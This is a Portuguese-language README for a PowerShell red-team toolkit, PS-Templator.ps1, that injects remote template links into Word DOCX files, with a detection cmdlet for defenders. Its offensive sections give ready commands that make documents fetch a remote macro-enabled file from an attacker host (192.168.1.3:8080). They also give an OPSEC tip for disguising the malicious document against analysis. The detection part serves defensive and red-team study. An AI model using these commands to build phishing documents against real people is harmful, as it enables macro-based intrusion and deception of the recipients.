
Kit de ferramentas PowerShell para ataques e defesa de injeção remota de modelos. Injeta links maliciosos em documentos do Office Word para phishing, com módulos de identificação para equipes azuis.
Kit de Injeção de Template Remoto
O RTI-Toolkit é um kit de ferramentas PowerShell de código aberto para ataques de Injeção de Template Remoto. Este kit inclui um script PowerShell chamado PS-Templator.ps1 que pode ser usado tanto numa perspetiva ofensiva quanto defensiva.
A tabela seguinte apresenta os principais módulos (cmdlets) do PS-Templator.ps1:
| Cmdlet | Descrição | Perspetiva |
|---|---|---|
| Invoke-Template | Implementa links de template remoto nos modelos padrão do Office Word | Ofensiva |
| Invoke-Regular | Implementa links de template remoto em documentos normais do Office Word sem template | Ofensiva |
| Invoke-Identify | Identifica links de template remoto em documentos Office Word docx com/sem template | Defensiva |
⚠️ O PS-Templator.ps1 suporta apenas ficheiros DOCX.
ℹ️ Esta ferramenta é referenciada pelo National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) em CVE-2025-65318 e CVE-2025-65319.
Esta ferramenta está licenciada sob a .
Agradecimentos especiais aos meus amigos @Papadope9 e Stavros Gkounis (também conhecido como purpl3ph03n1x), que prestaram uma ajuda inestimável durante a fase de testes beta da ferramenta.
Esta ferramenta foi inspirada durante uma Avaliação de Red Teaming iCAST com @S1ckB0y1337 há alguns anos.
A Supernova foi criada com ❤️ por @nickvourd.
A Injeção de Template Remoto (RTI) no contexto do Microsoft Office refere-se a um tipo específico de vulnerabilidade de segurança que pode ser explorada através de templates maliciosos em documentos do Office (ex.: Word, Excel, PowerPoint).
Por exemplo, num ficheiro DOCX, o conteúdo é armazenado em formato XML dentro do arquivo, e alguns destes ficheiros XML podem referenciar recursos ou templates externos. Os atacantes podem de facto manipular estes ficheiros XML para inserir links ou conteúdos maliciosos que podem potencialmente explorar vulnerabilidades ou enganar os utilizadores.
Este é um ataque baseado em Macros.
Para carregar o PS-Templator.ps1 como módulo na memória, execute o seguinte comando:
Import-Module .\PS-Templator.ps1
ℹ️ O PS-Templator.ps1 funciona sem a necessidade de instalar quaisquer dependências adicionais.
ℹ️ O PS-Templator.ps1 funciona como módulo PowerShell.
ℹ️ O PS-Templator.ps1 foi testado numa máquina Windows 10 com Office 2019 Professional plus.
Invoke-Template é um cmdlet que implementa links de template remoto nos modelos padrão do Office Word.
Assumindo que tem um modelo Word padrão, como um destes:

Guardado como, por exemplo, 'Name.docx':

Se usar o cmdlet Invoke-Template pode inserir um link malicioso neste docx:
⚠️ Antes de executar Invoke-Template, certifique-se de guardar o documento e fechá-lo (terminar o seu processo).
Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx
Resultado:

Como pode ver, o módulo Invoke-Template mantém uma cópia de segurança do documento original e fornece o caminho completo para o documento malicioso.
Numa perspetiva de depuração, se converter o docx malicioso para um arquivo zip e navegar para /word/_rels/settings.xml.rels, pode ver o link malicioso:

Invoke-Regular é um cmdlet que implementa links de template remoto em documentos normais do Office Word sem templates.
Assumindo que tem um documento Word normal sem template, como este:

Guardado como, por exemplo, 'Doc1.docx':

Se usar o cmdlet Invoke-Regular pode inserir um link malicioso neste docx:
⚠️ Antes de executar Invoke-Regular, certifique-se de guardar o documento e fechá-lo (terminar o seu processo).
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx
Resultado:

Como pode ver, o módulo Invoke-Regular mantém uma cópia de segurança do documento original e fornece o caminho completo para o documento malicioso.
Numa perspetiva de depuração, se converter o docx malicioso para um arquivo zip e navegar para /word/_rels/settings.xml.rels, pode ver o link malicioso:

Numa perspetiva OPSEC, pode usar -TemplateName em conjunto com o módulo Invoke-Regular. Isto fará com que o seu documento malicioso pareça mais legítimo se alguém tentar analisá-lo.
Aqui está um exemplo:
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx
Resultado:

Numa perspetiva de depuração, se converter o docx malicioso para um arquivo zip e navegar para /docProps/app.xml, pode ver o nome do template falso:

Invoke-Identify é um cmdlet que identifica links de template remoto em documentos Office Word docx com/sem template.
Assumindo que tem um documento Word malicioso:
Invoke-Identify -InputDoc LegitDocument.docx -Output C:\Users\User\Desktop\output.txt
Resultado:

Assumindo que tem um documento Word não malicioso:
Invoke-Identify -InputDoc Name.docx -Output C:\Users\User\Desktop\output2.txt
Resultado:
